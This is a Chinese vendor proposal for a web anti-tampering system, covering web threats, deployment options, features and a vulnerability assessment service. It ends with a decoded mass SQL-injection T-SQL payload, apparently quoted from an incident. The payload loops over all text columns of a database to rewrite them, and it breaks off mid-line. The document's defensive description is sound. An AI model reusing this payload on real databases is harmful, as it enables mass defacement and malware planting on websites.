网页防篡改方案2.docx

RH网页防篡改解决方案 上海睿宏电子科技发展有限公司2013-02-05 目录1方案概述31.1 WEB安全现状分析31.2 企业WEB服务器面临的威胁51.2.1跨站脚本51.2.2注入攻击51.2.3越权操作61.2.4文件上传61.2.5信息泄露71.3面向应用层新型攻击特点72防篡改总体方案设计82.1防篡改系统部署方式82.1.1 系统组成82.1.2系统部署82.2防篡改系统平台支持132.3防篡改系统功能特点142.3.1网页文件保护142.3.2网络攻击防护142.3.3系统自我保护142.3.4网站安全发布142.3.5网站备份还原142.3.6实时报警152.3.7管理员权限分级152.3.8日志审计152.3.9网站智能分析152.3.10系统信息检测182.3.11集中管理182.4防篡改系统优势182.5 WEB防篡改系统为企业带来的价值183网站系统漏洞评估专业服务193.1漏洞评估服务概述193.2服务内容介绍193.3评估实践介绍204部分用户案例221方案概述1.1 WEB安全现状分析 随着互联网技术的迅猛发展，许多政府和企业的关键业务活动越来越多地依赖于WEB应用，在向客户提供通过浏览器访问企业信息功能的同时，企业所面临的风险在不断增加。主要表现在两个层面：一是随着Web应用程序的增多，这些Web应用程序所带来的安全漏洞越来越多；二是随着互联网技术的发展，被用来进行攻击的黑客工具越来越多、黑客活动越来越猖獗,组织性和经济利益驱动非常明显。然而与之形成鲜明对比的却是：现阶段的安全解决方案无一例外的把重点放在网络安全层面，致使面临应用层攻击（如：针对WEB应用的SQL注入攻击、跨站脚本攻击等）发生时，传统的网络防火墙、IDS/IPS等安全产品对网站攻击几乎不起作用，许多政府和企业门户网站成为黑客组织成批传播木马的最有效途径。据统计75%的网络攻击和互联网安全侵害源于应用软件，网页上的漏洞的根源还是来自程序开发者对网页程序编制和检测。未经过安全训练的程序员缺乏相关的网页安全知识；应用部门缺乏良好的编程规范和代码检测机制等等。解决此类问题必须在WEB应用软件开发程序上整治，仅仅靠打补丁和安装防火墙是远远不够的。2008 年上半年，中国大陆被篡改网站的数量相比往年处于明显上升趋势。国家互联网应急中心(CNCERT)监测到中国大陆被篡改网站总数达到35113 个，同比增加了23.7%。按月统计情况如图所示：2008 年上半年中国被篡改网站数量2008 年1 月至6 月期间，中国大陆政府网站被篡改数量基本保持平稳，各月累计达2242个。与去年上半年同期监测情况相比，增加了41%。从中可以看出，每月被篡改的域名网站约占整个大陆地区被篡改网站的7%，而 域名网站仅占.cn 域名的2.3%，因此政府网站仍然是黑客攻击的重要目标。具体比例如下图：1.2 企业WEB服务器面临的威胁1.2.1跨站脚本 跨站脚本攻击全称为Cross Site Script，一般缩写为XSS。此漏洞是由于应用程序在服务器端获取用户提交的数据时，没有对内容进行验证。使得攻击者精心构造的恶意脚本在普通用户的浏览器中得到执行，除了可以窃取其他用户、管理员的Cookie外，还可以进行挂马，使得更多的访问者感染恶意代码。在Web 2.0技术流行的今天，跨站脚本漏洞还有可能被蠕虫利用，进行大规模的攻击，危害很大。 此类漏洞的根本原因是，开发人员在编写应用程序时，对用户提交的数据过滤的不够严格，或者未过滤。由于考虑在实际开发中需要过滤的内容比较多，可能会有遗漏，因此我们建议开发人员在对用户输入的变量进行检查时，使用白名单方式，即，检查用户传入的变量是否是系统允许的类型，如果不是，就提示错误，直到用户传入合法的数据。1.2.2注入攻击注入攻击中最常见的是SQL注入，此攻击类型是由于应用程序在服务器端获取用户提交的数据时，没有对内容进行严格验证，就拼接到SQL语句中执行。攻击者可以精心构造特定的SQL语句使服务器执行，从而进行未授权的数据修改，甚至在数据库服务器上执行系统命令，对Web站点的安全造成严重威胁。 此类漏洞的根本原因是，开发人员在编写应用程序时，未使用安全的方式执行SQL查询，而使用了拼接的方式将变量输入到SQL语句中。防范SQL注入的最好方法是，修改应用程序代码，使用安全的方式执行SQL查询，例如：使用PreparedStatement方式。1.2.3越权操作越权操作通常是由于应用程序在编写时，对身份验证部分考虑的不全面。越权操作可以分为水平和垂直两个方面： 水平越权是指：部分页面未对访问者的角色进行严格检查，A用户可能利用应用程序的漏洞，可以访问到B用户的数据，进行越权查看，修改，甚至删除。此类越权操作可能导致用户信息泄漏，或者被恶意篡改，严重影响网站的形象。如果发生在存放有重要数据的系统中，可能会导致直接或间接经济损失，甚至引发法律纠纷。 垂直越权是指：部分页面未对访问者的角色进行严格区分，普通用户可能利用应用程序的漏洞，将自己提升到高一级用户的权限，例如管理员权限。此类越权操作可能导致管理员权限泄漏，攻击者用管理员权限进行一些非法操作，严重影响数据的安全性。如果管理员后台合并有其他漏洞，例如：图片上传漏洞，攻击者可以向系统中上传webshell，进一步提升权限，最终获得网站服务器的管理员权限，危害很大。1.2.4文件上传文件上传漏洞指：开发人员编写应用程序时，未对用户上传的文件的扩展名进行严格的检查，从而导致攻击者上传webshell，获取到网站的权限。文件上传大多数是由于开发人员的疏忽或者对安全的理解不深引发的。例如：开发人员只过滤了asp扩展名的文件，而未过滤asa、cer扩展名的文件，而asa、cer扩展名的文件也会被asp.dll解析，从而导致webshell被上传。 建议开发人员在对用户上传的文件进行操作时，严格检查扩展名，与防范XSS的方法类似，也使用白名单方式，例如：只允许用户上传jpg、gif、bmp、zip、rar扩展名的文件，其余扩展名的文件禁止上传。1.2.5信息泄露信息泄漏大致分为两类：一类是由于应用程序编写时对错误处理方便考虑不全面，使得用户提交非法数据时应用程序报错，在错误信息中可能包含大量操作系统版本、Web服务器版本、网站在服务器上的绝对路径等敏感信息。此类型漏洞攻击者可能无法直接利用，但和其他漏洞结合起来，就会对成功入侵起到很大的帮助。 还有一类是由于网站维护人员的疏忽，或者管理不规范，使得一些测试页面或者备份页面未及时删除，或者网页源代码中的注释过于详细，都可以不同程度的泄漏网站的信息。为攻击者获取网站权限创造便利条件。1.3面向应用层新型攻击特点n 隐蔽性强：利用Web漏洞发起对WEB应用的攻击纷繁复杂，包括SQL 注入，跨站脚本攻击等等，一个共同特点是隐蔽性强，不易发觉。n 攻击时间短：可在短短几秒到几分钟内完成一次数据窃取、一次木马种植、完成对整个数据库或Web服务器的控制，以至于非常困难做出人为反应。n 危害性大：目前几乎所有银行，证券，电信，移动，政府以及电子商务企业都提供在线交易，查询和交互服务。用户的机密信息包括账户，个人私密信息（如身份证），交易信息等等，都是通过Web存储于后台数据库中， 这样，在线服务器一旦瘫痪，或虽在正常运行，但后台数据已被篡改或者窃取， 都将造成企业或个人巨大的损失。据权威部门统计，目前身份失窃（identity theft）已成为全球最严重的问题之一。n 造成非常严重的有形和无形损失：目前，很多大型企业都是在国内外上市的企业， 一旦发生这类安全事件， 必将造成人心惶惶，名誉扫地，以至于造成经济和声誉上的巨大损失，即便不上市，其影响和损失也是不可估量的。2防篡改总体方案设计2.1防篡改系统部署方式2.1.1 系统组成安恒网站卫士网页防篡改系统由管理控制端(server)、监控端(agent)和发布端(push)三大模块组成。管理控制端程序可安装在任何一台服务器上，主要用于配置、管理和查看监控端、发布端的各种信息，并下发站点安全规则到监控端；监控端程序是安装在web服务器上的，主要是对站点进行保护备份和监测；发布端程序安装在更新服务器上，主要对站点文件进行实时更新。管理控制端主要用来配置和下发安全策略，提供管理员管理操作监控端和发布端的Web管理界面，并通过传输服务模块和通讯模块负责和监控端的文件传输、日志报警、系统状态等数据。监控端主要包含文件防篡改模块和web防攻击模块。文件防篡改模块主要对站点网页文件或文件夹进行实时保护，实现的是站点静态区域文件的保护；web防攻击模块主要对网页访问进行保护，如防止非法网页请求和SQL注入攻击等，实现的是站点动态区域文件的保护。2.1.2系统部署在部署网页防篡改系统时，首先需要架设管理控制端，然后，在Web服务器上安装监控端软件，通过在管理控制端的配置监控端认证信息，即可实现管理控制端和监控端之间的安全连接。站点管理员通过管理控制端可以查看监控端的运行情况及日志信息。发布端部署在更新服务器上，负责所有网页内容的更新。由于管理控制端有着管理控制、站点备份的权力，一般在管理控制端前架设一台应用网关设备，用于站点管理员安全地连到管理控制端。根据用户状况、需求、提供环境的不同，网站卫士可采用不同的部署方式。1、简单部署方式简单部署方式如图2-1所示，即把网站卫士系统的监控端、发布端和管理控制端软件仅部署在一台Web服务器上。Web服务器既接收网页发布，也对外提供Web服务。另外，如果网站管理员需要远程到Web服务器进行维护和更新，可以采用VPN或FTP的方式。这种部署环境比较适合哪些小型的、需要租用专门机构的Web服务器的机构。图 2-1 简单部署方式示例在安全考虑上，由于Web服务器对外提供Web服务，需要暴露在外网中。因此，Web服务所在的网页目录更容易遭到攻击。这种部署方式能够在一定程度上防止对网页的直接篡改。但是，由于发布目录和Web服务目录都在Web服务器上（虽然在不同目录上），手段极其高明的黑客有可能找到这个目录并加以篡改。因此，这种部署方式并不能完全发挥网站卫士的安全防护作用。一般情况下，并不建议这种部署方式。2、基本部署方式基本部署方式需要两台服务器。即把网站卫士系统的监控端软件安装在一台Web服务器上，发布端和管理控制端软件安装在另一台服务器上，用来发布、更新站点文件的内容，如图2-2所示。图2-2 基本部署方式示例一般来说，发布服务器位于内网中，处于相对安全的环境中。所有网页的合法变更（包括增加、修改、删除、重命名）都在发布端进行，启用监控端的自动发布功能，发布服务器上的任何文件/目录的变化都会自动和立即反映到Web服务器上的相应位置。因此，这种方式具有很好的Web安全防护效果。另外，如果网站管理员需要远程到Web服务器进行维护和更新，可以采用VPN或FTP的方式。这样，发布服务器会自动对前段站点进行更新，同时也保证了数据传输的安全性。基本部署方式既可以实现具有统一网站编辑部门的组织或机构的集中发布，也可以满足具有多个下属部门独立制作，需要通过互联网远程发布的组织或机构的分布式发布要求。3、扩展部署方式这种部署方式是基本部署方式的扩展，它把网站卫士系统的发布端和管理控制端软件分别装到了两台独立服务器上，如图2-3所示。图2-3 扩展部署方式示例4、标准部署方式由于现今大多数网站都使用了内容管理系统（CMS）进行网页的编辑、审核、签发和合成等工作，为了满足这些机构组织的需求，安恒提供了这种环境的标准部署方式。如图2-4所示，该部署方式把网站卫士系统的监控端软件安装在一台Web服务器上，发布端和管理控制端直接安装在CMS上，把CMS发布的目录作为发布端的发布目录，这样，无需更改CMS的端口，即可实现发布端对Web服务器文件/目录的更新。图2-4 标准部署方式示例5、多Web服务器部署方式多Web服务器部署方式适合大型的门户网站，它具有多台独立的Web服务器，它们的网络地址、网络内容是不一样的，甚至操作系统也不一样。它们可以使用一套内容管理系统，也可以使用不同的内容管理系统。部署方式如图2-5所示，在CMS上安装安恒网站卫士系统的发布端和管理控制端，用于更新主站点Web服务器上的内容；在主站点的Web服务器上安装发布端和监控端，其上的发布端主要用来更新分站点上Web服务器上的内容；另外，需要在各个分站点安装网站卫士系统的监控端。图2-5 多Web服务器部署方式示例2.2防篡改系统平台支持管理控制端（安恒网站卫士-Server）：Windows操作系统：Windows2000，Windows XP，Windows2003发布端（安恒网站卫士-Push）：Windows系统：Windows2000，Windows XP，Windows2003Linux系统：Redhat Linux、RedFlag Linux、Turbo Linux监控端(安恒网站卫士-Agent)：Windows系统：Windows2000，Windows XP，Windows2003 Linux系统：Redhat Linux、RedFlag Linux、Turbo Linux内嵌模块：IIS：5.x，6.x，7.xApache：1.3，2.0， 2.2Java系列：weblogic，websphere，jboss，tomcat，resin等2.3防篡改系统功能特点2.3.1网页文件保护通过web防攻击模块、防篡改模块（系统内核层的文件驱动），可对动态和静态网页文件进行完美的保护。按照用户配置的进程及路径访问规则，设置网站目录、文件的读写权限，限制文件目录的增、删、改操作行为，确保网页文件不被非法篡改。2.3.2网络攻击防护web防攻击模块对每个请求进行合法性检测，只允许规则内合法的访问请求，对非法请求或恶意扫描请求，则立即进行屏蔽，防止SQL注入式攻击。Web 核心特征库会定期升级，保障其强大的检测能力。2.3.3系统自我保护安恒网站卫士网页防篡改系统能够实时地保护自己，不被非法的删除、修改、卸载等，保证了即使服务器被非法入侵，也不能够对网站进行篡改，不能够对网站管理系统进行破坏。2.3.4网站安全发布使用传输模块从监控端的镜像站点直接更新受保护的网站目录，数据通过SSL加密传输，杜绝传输过程的被篡改的可能。2.3.5网站备份还原安恒网站卫士网页防篡改系统支持监控站点数据备份还原功能，可对监控站点目录文件和数据库进行全量或增量备份。用户可以通过启用发布端的自动发布功能，在不停止备份功能的前提下，自动更新网页，发布端会自动将这些内容更新到Web服务器上。2.3.6实时报警对非法篡改行为，系统会自动记录报警日志，并通过手机短信、电子邮件、syslog等多种方式通知管理员。能对网站攻击做到快速响应，及时应变。2.3.7管理员权限分级可对管理员及监控端分配不同的权限组合。2.3.8日志审计提供管理员行为日志，包括：时间、事件、操作对象、行为、IP地址等详尽信息，方便区分正常更新过程还是篡改攻击行为；支持保护日志查询审计功能；用户不能进行日志修改、删除操作，确保日志的准确性与完整性。2.3.9网站智能分析1、可获得整个网站全面细致的综合访问情况，如图2-1所示； 图 2-1网站综合防问情况示例2、对网站进行树结构管理，操作轻松简便，并可得到多级栏目的分析结果（可无限延伸到多级栏目），如图2-2所示； 图 2-2网站多级栏目分析示例3、可灵活设定条件分析访问者的各种行为，如图2-3所示； 图 2-3 访问者的行为设定示例4、了解浏览者的地区分布，对于市场分布一目了然，如图2-4所示； 图 2-4 浏览者地区分布示例5、生成时间报表，了解任意时间段内网站访问的趋势，如图2-5所示； 图 2-5 网站访问趋势示例6、通过详尽的动态报表提供更加丰富的结果，如图2-6所示；图2-6 生成动态报表示例7、可将分析结果导出成PDF 和EXCEL 报表；8、可以同时管理多个网站，并可单个分析和汇总各个子站点的分析结果。2.3.10系统信息检测管理控制端机器能记录所有监控端Web服务器的CPU、内存、硬盘等应用情况，方便管理员根据提供的硬件信息做升级和维护调整。2.3.11集中管理通过监控端集中管理多台Web服务器，监测多主机实时状态，制定保护规则，接收Web服务器的报警和日志信息。控制Web服务器的启用、关闭、禁用等状态，并可对Web服务器的日志和报警情况做统计分析。2.4防篡改系统优势u 技术先进：采用第三代全新的防篡改技术，稳定、可靠、高效、兼容性高；u 保护全面：即时内容恢复与实时动态攻击防护相结合，全面保护各类网页和网站数据安全；u 操作简便：全中文操作界面、导航式安装提示、内置安全模板，大大缩短部署时间；u 内容传输：支持多Web服务器并行发布、断点续传、加密传输、同步端自带HA功能；u 配置灵活：访问策略可以灵活配置、功能模块可以灵活组合、文件类型可以按需添加；2.5 WEB防篡改系统为企业带来的价值WEB防篡改系统的应用将实现如下效果：动态深度防御n通过专业WEB入侵异常检测技术，对网银动态访问实施全面、深度分析，有效识别、阻止各类WEB应用黑客攻击（如SQL注入、钓鱼攻击、表单绕过、缓冲区溢出、CGI扫描、目录遍历等）。敏感信息泄露防护n通过安全防护策略，灵活定义HTTP/HTTPS错误返回的默认页面，避免因为WEB服务异常，导致敏感信息（如：WEB应用安装目录、WEB服务器版本信息等）的泄露。事中告警n针对各类攻击行为及异常访问行为，实时告警并通过各类方式通知给安全管理员，便于快速处理安全事件。事后分析n提供详细的WEB应用攻击访问日志，实现对攻击源的定位分析，同时提供各类统计分析，方便掌握整个应用系统的动态安全状况。3网站系统漏洞评估专业服务3.1漏洞评估服务概述由于WEB应用程序本身具有无法完全克服的安全漏洞，为黑客的入侵提供了可乘之机。WEB安全专业服务（WEB Security Professional Service）通过专业的安全工具、白客级的专家团队，协助客户对WEB应用进行常规扫描、高频度检测，对WEB应用安全事件进行成因分析、应急修复。同时帮助安全开发及维护人员及时了解安全知识、提升安全技能，从而切实增强WEB应用的整体抗风险能力。3.2服务内容介绍WEB漏洞评估服务主要包含以下三大类、六方面：大类子类说明提交文档漏洞检测SQL注入漏洞SQL注入漏洞产生原因是网站程序在编写时，没有对用户输入数据的合法性进行判断，导致应用程序存在安全隐患网站漏洞扫描报告跨站脚本漏洞跨站脚本攻击简称为XSS又称CSS，是指服务器端的CGI程序没有对用户提交变量中的HTML代码进行有效的过滤或转换，允许攻击者往WEB页面里插入对终端用户造成影响或损失的HTML代码相关漏洞检测检测内容包括：FORM检测、AJAX注入检测、中间人攻击检测、X path注入检测、Cookies注入检测等第三方软件漏洞第三方软件漏洞一般是指网站后台编辑器、服务器软件如IIS、Apache等本身可能存在的安全漏洞，导致对外服务网站存在入侵隐患木马检测由于应用系统存在可被利用的安全漏洞，可能已被恶意人员进行挂马获取相应权限或用以传播病毒木马检查报告渗透测试在用户授权的前提下，通过模拟黑客的攻击方法对Web应用系统进行非破坏性质的攻击性测试，目的是侵入系统，获取系统控制权并将入侵的过程和细节产生报告给用户，由此证实Web应用系统所存在的安全威胁和风险，并能及时提醒Web应用系统管理员完善安全策略网站渗透性测试报告3.3评估实践介绍国内首次发现网站群注风暴2008年5月，公司安全研究服务团队在某网站应急响应中首次发现并处理了全球性的网站群注风暴攻击，并且在国内首家发布了红色预警。网络群注(Mass Injection), 可以简单翻译为巨量的SQL注入(SQL Injection)。SQL注入是一种目前最流行的利用网站应用程序漏洞对数据库以及服务器进行攻击的手段，这种攻击可能是窃取数据、插入数据、篡改数据、删除数据或者执行任意命令以致直接控制服务器。这类攻击适用范围极为广泛，目前80%以上的网站挂马是出自这类攻击，而群注则在单个网站攻击的基础上在自动化和智能性方面更进了一步， 也就是说, 从发现网站目标到发现漏洞点到注射木马，全自动一气呵成, 效率极高，很多国外著名的安全网站也惨遭毒手, 更不用说是国内的许许多多防范不严的网站了。某网站的群注攻击解码后： DECLARE T varchar(255),C varchar(255) DECLARE Table_Cursor CURSOR FOR select , from sysobjects a,syscolumns b where a.id=b.id and a.xtype=u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO T,C WHILE(FETCH_STATUS=0) BEGIN exec(update +T+ set +C+=rtrim(convert(varchar,+C+)